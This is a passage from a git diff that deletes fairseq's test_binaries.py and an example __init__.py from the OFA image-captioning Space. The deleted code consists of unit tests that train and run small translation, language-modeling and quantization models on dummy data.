resumed - ), f"difference at {k} {from_scratch} != {resumed}" - - def test_memory_efficient_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_memory_efficient_fp16") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--memory-efficient-fp16"] - ) - generate_main(data_dir) - - def test_transformer_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--fp16", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_amp") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en", ["--amp"]) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_transformer_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--amp", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_levenshtein_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_levenshtein_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "levenshtein_transformer", - [ - "--apply-bert-init", - "--early-exit", - "6,6,6", - "--criterion", - "nat_loss", - ], - task="translation_lev", - ) - gen_config = [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ] - # non-ensemble generation - generate_main(data_dir, gen_config) - # ensemble generation - generate_main( - data_dir, - gen_config, - path=os.pathsep.join( - [ - os.path.join(data_dir, "checkpoint_last.pt"), - os.path.join(data_dir, "checkpoint_last.pt"), - ] - ), - ) - - def test_fsdp_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded"], - world_size=world_size, - ) - generate_main(data_dir) - assert os.path.exists(log) - - def test_fsdp_sharded_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded", "--use-sharded-state"], - world_size=world_size, - ) - generate_main(data_dir, ["--checkpoint-shard-count", str(world_size)]) - assert os.path.exists(log) - - -def _quantize_language_model(data_dir, arch, extra_flags=None, run_validation=False): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - # try scalar quantization - scalar_quant_train_parser = options.get_training_parser() - scalar_quant_train_args = options.parse_args_and_arch( - scalar_quant_train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-update", - "3", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--quant-noise-scalar", - "0.5", - ] - + (extra_flags or []), - ) - train.main(scalar_quant_train_args) - - # try iterative PQ quantization - quantize_parser = options.get_training_parser() - quantize_args = options.parse_args_and_arch( - quantize_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "50", - "--tokens-per-sample", - "50", - "--max-update", - "6", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--restore-file", - os.path.join(data_dir, "checkpoint_last.pt"), - "--reset-optimizer", - "--quantization-config-path", - os.path.join( - os.path.dirname(__file__), "transformer_quantization_config.yaml" - ), - ] - + (extra_flags or []), - ) - train.main(quantize_args) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestQuantization(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_quantization(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_quantization") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - # tests both scalar and iterative PQ quantization - _quantize_language_model(data_dir, "transformer_lm") - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestOptimizersGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_flat_grads(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_flat_grads") as data_dir: - # Use just a bit of data and tiny model to keep this test runtime reasonable - create_dummy_data(data_dir, num_examples=10, maxlen=5) - preprocess_translation_data(data_dir) - with self.assertRaises(RuntimeError): - # adafactor isn't compatible with flat grads, which - # are used by default with --fp16 - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - ], - ) - # but it should pass once we set --fp16-no-flatten-grads - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - "--fp16-no-flatten-grads", - ], - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/rxf/rxf_src/__init__.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/rxf/rxf_src/__init__.py deleted file mode 100644 index 306e232d6f386b26153864601114e162080dcee4..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/examples/rxf/rxf_src/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import label_smoothed_cross_entropy_r3f, sentence_prediction_r3f # noqa diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/test_binaries.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/test_binaries.py deleted file mode 100644 index 4e207742625427f108f78bcd24d487a081b6ccf7..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/test_binaries.py +++ /dev/null @@ -1,1874 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import contextlib -import logging -import json -import os -import random -import sys -import tempfile -import unittest -from io import StringIO -from typing import List, Dict -import torch -from fairseq import options -from fairseq_cli import eval_lm, train -from tests.utils import ( - create_dummy_data, - generate_main, - preprocess_lm_data, - preprocess_summarization_data, - preprocess_translation_data, - create_laser_data_and_config_json, - train_translation_model, - train_language_model, -) - - -try: - import transformers # noqa - - has_hf_transformers = True -except ImportError: - has_hf_transformers = False - - -class TestTranslation(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fconv(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en") - generate_main(data_dir) - - def test_raw(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv_raw") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--dataset-impl", "raw"]) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--dataset-impl", "raw"] - ) - generate_main(data_dir, ["--dataset-impl", "raw"]) - - def test_update_freq(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_update_freq") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--update-freq", "3"] - ) - generate_main(data_dir) - - def test_max_positions(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_max_positions") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - with self.assertRaises(Exception) as context: - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--max-target-positions", "5"], - ) - self.assertTrue( - "skip this example with --skip-invalid-size-inputs-valid-test" - in str(context.exception) - ) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - [ - "--max-target-positions", - "5", - "--skip-invalid-size-inputs-valid-test", - ], - ) - with self.assertRaises(Exception) as context: - generate_main(data_dir) - generate_main(data_dir, ["--skip-invalid-size-inputs-valid-test"]) - - def test_generation(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_sampling") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en") - generate_main( - data_dir, - [ - "--sampling", - "--temperature", - "2", - "--beam", - "2", - "--nbest", - "2", - ], - ) - generate_main( - data_dir, - [ - "--sampling", - "--sampling-topk", - "3", - "--beam", - "2", - "--nbest", - "2", - ], - ) - generate_main( - data_dir, - [ - "--sampling", - "--sampling-topp", - "0.2", - "--beam", - "2", - "--nbest", - "2", - ], - ) - generate_main( - data_dir, - [ - "--diversity-rate", - "0.5", - "--beam", - "6", - ], - ) - with self.assertRaises(ValueError): - generate_main( - data_dir, - [ - "--diverse-beam-groups", - "4", - "--match-source-len", - ], - ) - generate_main(data_dir, ["--prefix-size", "2"]) - generate_main(data_dir, ["--retain-dropout"]) - - def test_eval_bleu(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_eval_bleu") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - [ - "--eval-bleu", - "--eval-bleu-print-samples", - "--eval-bleu-remove-bpe", - "--eval-bleu-detok", - "space", - "--eval-bleu-args", - '{"beam": 4, "min_len": 10}', - ], - ) - - def test_lstm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lstm_wiseman_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-out-embed-dim", - "8", - ], - ) - generate_main(data_dir) - - def test_lstm_bidirectional(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm_bidirectional") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lstm", - [ - "--encoder-layers", - "2", - "--encoder-bidirectional", - "--encoder-hidden-size", - "16", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-out-embed-dim", - "8", - "--decoder-layers", - "2", - ], - ) - generate_main(data_dir) - - def test_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - run_validation=True, - ) - generate_main(data_dir) - - def test_multilingual_transformer(self): - # test with all combinations of encoder/decoder lang tokens - encoder_langtok_flags = [ - [], - ["--encoder-langtok", "src"], - ["--encoder-langtok", "tgt"], - ] - decoder_langtok_flags = [[], ["--decoder-langtok"]] - with contextlib.redirect_stdout(StringIO()): - for i in range(len(encoder_langtok_flags)): - for j in range(len(decoder_langtok_flags)): - enc_ltok_flag = encoder_langtok_flags[i] - dec_ltok_flag = decoder_langtok_flags[j] - with tempfile.TemporaryDirectory( - f"test_multilingual_transformer_{i}_{j}" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - arch="multilingual_transformer", - task="multilingual_translation", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out,out-in"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "multilingual_translation", - "--lang-pairs", - "in-out,out-in", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - @unittest.skipIf( - sys.platform.lower() == "darwin", "skip latent depth test on MacOS" - ) - def test_multilingual_translation_latent_depth(self): - # test with latent depth in encoder, decoder, or both - encoder_latent_layer = [[], ["--encoder-latent-layer"]] - decoder_latent_layer = [[], ["--decoder-latent-layer"]] - with contextlib.redirect_stdout(StringIO()): - for i in range(len(encoder_latent_layer)): - for j in range(len(decoder_latent_layer)): - if i == 0 and j == 0: - continue - enc_ll_flag = encoder_latent_layer[i] - dec_ll_flag = decoder_latent_layer[j] - with tempfile.TemporaryDirectory( - f"test_multilingual_translation_latent_depth_{i}_{j}" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data( - data_dir, extra_flags=["--joined-dictionary"] - ) - train_translation_model( - data_dir, - arch="latent_multilingual_transformer", - task="multilingual_translation_latent_depth", - extra_flags=[ - "--user-dir", - "examples/latent_depth/latent_depth_src", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--share-encoders", - "--share-decoders", - "--sparsity-weight", - "0.1", - ] - + enc_ll_flag - + dec_ll_flag, - lang_flags=["--lang-pairs", "in-out,out-in"], - run_validation=True, - extra_valid_flags=[ - "--user-dir", - "examples/latent_depth/latent_depth_src", - ] - + enc_ll_flag - + dec_ll_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--user-dir", - "examples/latent_depth/latent_depth_src", - "--task", - "multilingual_translation_latent_depth", - "--lang-pairs", - "in-out,out-in", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ll_flag - + dec_ll_flag, - ) - - def test_translation_multi_simple_epoch(self): - # test with all combinations of encoder/decoder lang tokens - encoder_langtok_flags = [ - [], - ["--encoder-langtok", "src"], - ["--encoder-langtok", "tgt"], - ] - decoder_langtok_flags = [[], ["--decoder-langtok"]] - with contextlib.redirect_stdout(StringIO()): - for i in range(len(encoder_langtok_flags)): - for j in range(len(decoder_langtok_flags)): - enc_ltok_flag = encoder_langtok_flags[i] - dec_ltok_flag = decoder_langtok_flags[j] - with tempfile.TemporaryDirectory( - f"test_translation_multi_simple_epoch_{i}_{j}" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data( - data_dir, extra_flags=["--joined-dictionary"] - ) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - "--virtual-epoch-size", - "1000", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out,out-in"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out,out-in", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_translation_multi_simple_epoch_no_vepoch(self): - # test with all combinations of encoder/decoder lang tokens - with contextlib.redirect_stdout(StringIO()): - enc_ltok_flag = ["--encoder-langtok", "src"] - dec_ltok_flag = ["--decoder-langtok"] - with tempfile.TemporaryDirectory( - "test_translation_multi_simple_epoch_dict" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, extra_flags=[]) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_translation_multi_simple_epoch_dicts(self): - # test with all combinations of encoder/decoder lang tokens - with contextlib.redirect_stdout(StringIO()): - enc_ltok_flag = ["--encoder-langtok", "src"] - dec_ltok_flag = ["--decoder-langtok"] - with tempfile.TemporaryDirectory( - "test_translation_multi_simple_epoch_dict" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, extra_flags=[]) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - "--virtual-epoch-size", - "1000", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_translation_multi_simple_epoch_src_tgt_dict_spec(self): - # test the specification of explicit --src-dict and --tgt-dict - with contextlib.redirect_stdout(StringIO()): - enc_ltok_flag = ["--encoder-langtok", "src"] - dec_ltok_flag = ["--decoder-langtok"] - with tempfile.TemporaryDirectory( - "test_translation_multi_simple_epoch_dict" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, extra_flags=[]) - train_translation_model( - data_dir, - arch="transformer", - task="translation_multi_simple_epoch", - extra_flags=[ - "--source-dict", - f"{data_dir}/dict.in.txt", - "--target-dict", - f"{data_dir}/dict.out.txt", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--sampling-method", - "temperature", - "--sampling-temperature", - "1.5", - "--virtual-epoch-size", - "1000", - ] - + enc_ltok_flag - + dec_ltok_flag, - lang_flags=["--lang-pairs", "in-out"], - run_validation=True, - extra_valid_flags=enc_ltok_flag + dec_ltok_flag, - ) - generate_main( - data_dir, - extra_flags=[ - "--task", - "translation_multi_simple_epoch", - "--lang-pairs", - "in-out", - "--source-lang", - "in", - "--target-lang", - "out", - ] - + enc_ltok_flag - + dec_ltok_flag, - ) - - def test_transformer_cross_self_attention(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_transformer_cross_self_attention" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--no-cross-attention", - "--cross-self-attention", - ], - run_validation=True, - ) - generate_main(data_dir, extra_flags=[]) - - def test_transformer_pointer_generator(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_transformer_pointer_generator" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_summarization_data(data_dir) - train_translation_model( - data_dir, - "transformer_pointer_generator", - extra_flags=[ - "--user-dir", - "examples/pointer_generator/pointer_generator_src", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--alignment-layer", - "-1", - "--alignment-heads", - "1", - "--source-position-markers", - "0", - ], - run_validation=True, - extra_valid_flags=[ - "--user-dir", - "examples/pointer_generator/pointer_generator_src", - ], - ) - generate_main( - data_dir, - extra_flags=[ - "--user-dir", - "examples/pointer_generator/pointer_generator_src", - ], - ) - - def test_lightconv(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lightconv") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lightconv_iwslt_de_en", - [ - "--encoder-conv-type", - "lightweight", - "--decoder-conv-type", - "lightweight", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - ) - generate_main(data_dir) - - def test_dynamicconv(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_dynamicconv") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "lightconv_iwslt_de_en", - [ - "--encoder-conv-type", - "dynamic", - "--decoder-conv-type", - "dynamic", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - ) - generate_main(data_dir) - - def test_cmlm_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_cmlm_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "cmlm_transformer", - [ - "--apply-bert-init", - "--criterion", - "nat_loss", - "--noise", - "full_mask", - "--pred-length-offset", - "--length-loss-factor", - "0.1", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - def test_nonautoregressive_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_nonautoregressive_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "nonautoregressive_transformer", - [ - "--apply-bert-init", - "--src-embedding-copy", - "--criterion", - "nat_loss", - "--noise", - "full_mask", - "--pred-length-offset", - "--length-loss-factor", - "0.1", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "0", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - # def test_nat_crf_transformer(self): - # with contextlib.redirect_stdout(StringIO()): - # with tempfile.TemporaryDirectory('test_nat_crf_transformer') as data_dir: - # create_dummy_data(data_dir) - # preprocess_translation_data(data_dir, ['--joined-dictionary']) - # train_translation_model(data_dir, 'nacrf_transformer', [ - # '--apply-bert-init', '--criterion', - # 'nat_loss', '--noise', 'full_mask', '--pred-length-offset', - # '--length-loss-factor', '0.1', - # '--word-ins-loss-factor', '0.5', - # '--crf-lowrank-approx', '1', - # '--crf-beam-approx', '1' - # ], task='translation_lev') - # generate_main(data_dir, [ - # '--task', 'translation_lev', - # '--iter-decode-max-iter', '0', - # '--iter-decode-eos-penalty', '0', - # '--print-step', - # ]) - - def test_iterative_nonautoregressive_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_iterative_nonautoregressive_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "iterative_nonautoregressive_transformer", - [ - "--apply-bert-init", - "--src-embedding-copy", - "--criterion", - "nat_loss", - "--noise", - "full_mask", - "--stochastic-approx", - "--dae-ratio", - "0.5", - "--train-step", - "3", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - def test_insertion_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_insertion_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "insertion_transformer", - [ - "--apply-bert-init", - "--criterion", - "nat_loss", - "--noise", - "random_mask", - ], - task="translation_lev", - ) - generate_main( - data_dir, - [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ], - ) - - def test_mixture_of_experts(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_moe") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--task", - "translation_moe", - "--user-dir", - "examples/translation_moe/translation_moe_src", - "--method", - "hMoElp", - "--mean-pool-gating-network", - "--num-experts", - "3", - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - ], - ) - generate_main( - data_dir, - [ - "--task", - "translation_moe", - "--user-dir", - "examples/translation_moe/translation_moe_src", - "--method", - "hMoElp", - "--mean-pool-gating-network", - "--num-experts", - "3", - "--gen-expert", - "0", - ], - ) - - def test_alignment(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_alignment") as data_dir: - create_dummy_data(data_dir, alignment=True) - preprocess_translation_data(data_dir, ["--align-suffix", "align"]) - train_translation_model( - data_dir, - "transformer_align", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--load-alignments", - "--alignment-layer", - "1", - "--criterion", - "label_smoothed_cross_entropy_with_alignment", - ], - run_validation=True, - ) - generate_main(data_dir) - - def test_laser_lstm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_laser_lstm") as data_dir: - laser_config_file = create_laser_data_and_config_json(data_dir) - train_translation_model( - laser_config_file.name, - "laser_lstm", - [ - "--user-dir", - "examples/laser/laser_src", - "--weighting-alpha", - "0.3", - "--encoder-bidirectional", - "--encoder-hidden-size", - "512", - "--encoder-layers", - "5", - "--decoder-layers", - "1", - "--encoder-embed-dim", - "320", - "--decoder-embed-dim", - "320", - "--decoder-lang-embed-dim", - "32", - "--save-dir", - data_dir, - "--disable-validation", - ], - task="laser", - lang_flags=[], - ) - - def test_laser_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_laser_transformer") as data_dir: - laser_config_file = create_laser_data_and_config_json(data_dir) - train_translation_model( - laser_config_file.name, - "laser_transformer", - [ - "--user-dir", - "examples/laser/laser_src", - "--weighting-alpha", - "0.3", - "--encoder-embed-dim", - "320", - "--decoder-embed-dim", - "320", - "--decoder-lang-embed-dim", - "32", - "--save-dir", - data_dir, - "--disable-validation", - ], - task="laser", - lang_flags=[], - ) - - def test_alignment_full_context(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_alignment") as data_dir: - create_dummy_data(data_dir, alignment=True) - preprocess_translation_data(data_dir, ["--align-suffix", "align"]) - train_translation_model( - data_dir, - "transformer_align", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--load-alignments", - "--alignment-layer", - "1", - "--criterion", - "label_smoothed_cross_entropy_with_alignment", - "--full-context-alignment", - ], - run_validation=True, - ) - generate_main(data_dir) - - def test_transformer_layerdrop(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer_layerdrop") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "3", - "--decoder-layers", - "3", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--encoder-layerdrop", - "0.01", - "--decoder-layerdrop", - "0.01", - 